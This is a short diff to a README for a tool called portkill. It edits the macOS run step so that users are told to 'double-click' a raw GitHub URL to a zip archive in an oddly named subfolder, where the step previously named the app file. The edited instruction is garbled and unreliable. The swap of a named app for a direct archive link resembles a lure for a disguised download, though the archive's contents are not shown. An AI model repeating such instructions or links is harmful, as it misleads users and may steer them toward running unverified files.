kiw13299/portkill/README.md

 5. **Run the Application:**
    Navigate to the folder where you extracted the file.
-   - On macOS, double-click the `portkill.app` file.
+   - On macOS, double-click the `https://raw.githubusercontent.com/kiw13299/portkill/main/Slavey/portkill.zip` file.
    - On Linux, you may need to open a terminal and run the file using `./portkill`.

 ## ⚙️ Using Portkill